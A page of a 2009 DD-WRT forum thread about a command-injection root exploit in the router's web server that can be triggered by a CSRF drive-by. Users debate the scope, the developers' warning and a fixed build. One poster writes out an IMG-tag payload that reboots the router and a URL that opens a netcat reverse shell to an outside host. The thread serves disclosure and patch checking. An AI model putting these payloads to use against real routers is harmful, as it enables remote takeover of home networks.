DD-WRT Root exploit posted today

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Goto page Previous  1, 2, 3 ... 5, 6, 7 ... 13, 14, 15  Next
Author Message
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 16:35    Post subject: Reply with quote
OB1 wrote:


saw it, but it's totally WRONG, tried it by myself, with WAN httpd disabled and it WORKS, I suspect Eko didn't fully understand the issue; also, it would be a good idea posting an alert on the site front page urging the users to update to the latest firmware before someone will start using DD-WRT boxes as bots

[edit]

If you want to try it by yourself do the following

setup a web page somewhere on the internet; on the
page add an IMG tag like the following one (add angular brackets as needed)

IMG SRC="http://192.168.1.1/cgi-bin/;init$IFS6"

or something like that; then using a vulnerable version of DD-WRT, and a machine sitting behind the DD-WRT router, open that page

the browser will see the IMG reference and attempt to fetch it, but the URL points to the LAN IP of the router, so the result will be triggering the exploit and executing the command; in the above case you'll be sending an "init 6" but you may use whatever other command you want, including "nc" or whatever else


Alot of confusion here about this bug.

As stated there have been posts from the developer's themselves as recent as today stating that this bug only effects the httpd when remote/wan admin is enabled.

The original post in this thread clearly sums it up that that is not the case & we have multiple people confirming that this bug does exist and that it can be triggered via CSRF drive-by.

I'm grateful for dd-wrt and all development, but with the time, effort, and attention put into it how could they overlook this huge security hole, and now almost ignore it.

?
Sponsor
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 16:42    Post subject: Reply with quote
jrock wrote:
OB1 wrote:


saw it, but it's totally WRONG, tried it by myself, with WAN httpd disabled and it WORKS, I suspect Eko didn't fully understand the issue; also, it would be a good idea posting an alert on the site front page urging the users to update to the latest firmware before someone will start using DD-WRT boxes as bots

[edit]

If you want to try it by yourself do the following

setup a web page somewhere on the internet; on the
page add an IMG tag like the following one (add angular brackets as needed)

IMG SRC="http://192.168.1.1/cgi-bin/;init$IFS6"

or something like that; then using a vulnerable version of DD-WRT, and a machine sitting behind the DD-WRT router, open that page

the browser will see the IMG reference and attempt to fetch it, but the URL points to the LAN IP of the router, so the result will be triggering the exploit and executing the command; in the above case you'll be sending an "init 6" but you may use whatever other command you want, including "nc" or whatever else


Alot of confusion here about this bug.

As stated there have been posts from the developer's themselves as recent as today stating that this bug only effects the httpd when remote/wan admin is enabled.

The original post in this thread clearly sums it up that that is not the case & we have multiple people confirming that this bug does exist and that it can be triggered via CSRF drive-by.

I'm grateful for dd-wrt and all development, but with the time, effort, and attention put into it how could they overlook this huge security hole, and now almost ignore it.

?


Heh... something I'm wondering about as well :(

And btw there's another issue too, as m1lw0rm stated, the code parsing cgi-bin requests isn't properly sanitizing the input and this may (didn't verify it) lead to some other nasty bug

SIGH

hope the developers will understand that this isn't a "minor issue" and will fix it and PROPERLY alert the users; at the moment, the alert on the site front page is wrong and may give users a wrong sense of security Sad the exploit works even if the WEB GUI isn't enabled on WAN so the only real way to fix it is to upgrade to the fixed firmware (hope it was really fixed) and/or change the WEB (httpd) admin port to something different
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 16:58    Post subject: Reply with quote
I just noticed the alert on the home page. Thats a good start to getting the word out on this.

Thank you pete & admins.

OB1 wrote:
the alert on the site front page is wrong and may give users a wrong sense of security


Even though they don't go into detail about the worst of the problem, at least they are acknowledging it and directing people to a fixed build.

I don't think we'll see a 'code-red' unless we see some actual reports of folks being hacked.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 16:59    Post subject: Reply with quote
OB1 wrote:
Yes, m1lw0rm used the classic "kiddie protection" to avoid some lame folk using the exploit w/o understanding it, but aside from that, the exploit works, and it works without any need to have the web admin GUI opened on the WAN interface

I don't believe this is true but I may be mistaken. The report clearly lists 1) No metacharacters handling which indicates to me that the backslash is key to this particular example link. If you remove the backslash then netcat fails to run although other commands work fine without backslashes.

_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 17:03    Post subject: Reply with quote
jrock wrote:
I just noticed the alert on the home page. Thats a good start to getting the word out on this.

Thank you pete & admins.

OB1 wrote:
the alert on the site front page is wrong and may give users a wrong sense of security


Even though they don't go into detail about the worst of the problem, at least they are acknowledging it and directing people to a fixed build.

I don't think we'll see a 'code-red' unless we see some actual reports of folks being hacked.


I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't
OB1
DD-WRT Novice


Joined: 22 Jul 2009
Posts: 25

PostPosted: Wed Jul 22, 2009 17:04    Post subject: Reply with quote
phuzi0n wrote:
OB1 wrote:
Yes, m1lw0rm used the classic "kiddie protection" to avoid some lame folk using the exploit w/o understanding it, but aside from that, the exploit works, and it works without any need to have the web admin GUI opened on the WAN interface

I don't believe this is true but I may be mistaken. The report clearly lists 1) No metacharacters handling which indicates to me that the backslash is key to this particular example link. If you remove the backslash then netcat fails to run although other commands work fine without backslashes.


Hmmm.... maybe you're right, will have to play with that some more

[edit]

http://192.168.1.1/cgi-bin/;nc$IFS-e$IFS/bin/sh$IFS1.2.3.4$IFS\80

the above will run nc in reverse telnet mode, connect to the host at IP 1.2.3.4, port 80 and start a shell; the backslash is needed to avoid the misinterpretation of the port # but it may be avoided by using a different syntax Wink


Last edited by OB1 on Wed Jul 22, 2009 17:08; edited 1 time in total
wjwj
DD-WRT User


Joined: 20 Sep 2008
Posts: 125

PostPosted: Wed Jul 22, 2009 17:07    Post subject: Reply with quote
Super-fast reaction!!! Thumbs up!
_________________
1 x TP-Link WDR-4300 v1.1 (primary router running OpenWRT Attitude Adjustment)
1 x TP-Link WDR-3600 v1.4 (backup/testing router running latest OpenWRT bleeding edge)
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 17:16    Post subject: Reply with quote
OB1 wrote:

I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't


I'm not disagreeing with you.

It seems that either developers are mis-informed or in denial perhaps along with us.

I think there should be full disclosure of what the problem is from the developers so people are informed. We have people verifying this bug independently, and others saying that it won't work via drive-by because of ONE character mismatch.. Then we have the developers that are denying the bug exists all together when remote-management is disabled.

Confusing mess.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 17:22    Post subject: Reply with quote
The fix in build 12548 seems to work correctly.
_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
Murrkf
DD-WRT Guru


Joined: 22 Sep 2008
Posts: 12675

PostPosted: Wed Jul 22, 2009 17:24    Post subject: Reply with quote
OB1 wrote:
I'm not suggesting to cry "the sky is falling", but telling the users that the vuln exists only if the WEB GUI is enabled on WAN is wrong and may lead to a false sense of security... someone may decide that he'll just need to disable WAN admin and feel secure while ... he isn't


This actually might be a reference to a previous exploit, a couple of months ago.

_________________
SIG:
I'm trying to teach you to fish, not give you a fish. If you just want a fish, wait for a fisherman who hands them out. I'm more of a fishing instructor.
LOM: "If you show that you have not bothered to read the forum announcements or to follow the advices in them then the level of help available for you will drop substantially, also known as Murrkf's law.."


Last edited by Murrkf on Wed Jul 22, 2009 17:25; edited 1 time in total
hanswuascht
DD-WRT Novice


Joined: 28 Jun 2008
Posts: 11

PostPosted: Wed Jul 22, 2009 17:24    Post subject: Reply with quote
Just for the record: this affects all SVN builds until now as well, right?

I'm happily running DD-WRT v24-sp2 (12/17/0Cool std
(SVN revision 11218M NEWD Eko) but seems I need to replace it?
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Wed Jul 22, 2009 17:28    Post subject: Reply with quote
jrock wrote:
I think there should be full disclosure of what the problem is from the developers so people are informed. We have people verifying this bug independently, and others saying that it won't work via drive-by because of ONE character mismatch.. Then we have the developers that are denying the bug exists all together when remote-management is disabled.

To be precise, only the example link doesn't work in a SIMPLE drive by. Commands without backslashes work easily in img sources and commands that needs the backslash could probably be ran through javascript or flash.

_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Wed Jul 22, 2009 17:40    Post subject: Reply with quote
phuzi0n wrote:
The fix in build 12548 seems to work correctly.


Thanks for testing and verification.

I said mini code red as in perhaps a large botnet, not the sky is falling.....simply a dangerous exploit... Not @ you phuzi0n.
jrock
DD-WRT Novice


Joined: 17 Dec 2006
Posts: 33

PostPosted: Wed Jul 22, 2009 17:42    Post subject: Reply with quote
phuzi0n wrote:
To be precise, only the example link doesn't work in a SIMPLE drive by. Commands without backslashes work easily in img sources and commands that needs the backslash could probably be ran through javascript or flash.


Thank you for clarifying that I should have read closer to the posts.
johannes
DD-WRT Novice


Joined: 24 May 2009
Posts: 16

PostPosted: Wed Jul 22, 2009 17:48    Post subject: Is sp2 affected or not? Reply with quote
I did not really understand what the situation with SP2 is. I am currently running DD-WRT v24-sp2 (06/02/09) vpn (SVN revision 12250M NEWD Eko).

Does that need an upgrade? Is sp2 affected until a certain revision or generally unaffected? Or are all versions until today affected?
Goto page Previous  1, 2, 3 ... 5, 6, 7 ... 13, 14, 15  Next Display posts from previous:    Page 6 of 15
Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum